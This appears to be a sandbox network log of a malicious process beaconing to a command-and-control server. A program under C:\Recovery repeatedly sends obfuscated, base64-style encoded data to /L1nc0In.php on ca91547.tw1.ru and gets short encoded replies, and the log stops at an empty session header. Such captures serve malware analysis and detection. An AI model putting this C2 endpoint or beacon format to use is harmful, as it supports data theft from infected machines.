Dec 15, 2024 00:22:35.306803942 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:22:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:22:40.436460018 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:22:41.899338961 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:22:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:22:47.025840044 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:22:48.362159967 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:22:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:22:53.494647026 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:22:54.828996897 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:22:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49746	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:23:00.004884005 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:23:01.375571012 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:23:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49763	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:23:06.516992092 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:23:08.008574009 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:23:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49779	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:23:13.135539055 CET	2150	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMk [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:23:14.475341082 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:23:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49795	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:23:19.604608059 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:23:20.955966949 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:23:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49811	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:23:26.089617968 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:23:27.492877007 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:23:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49827	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
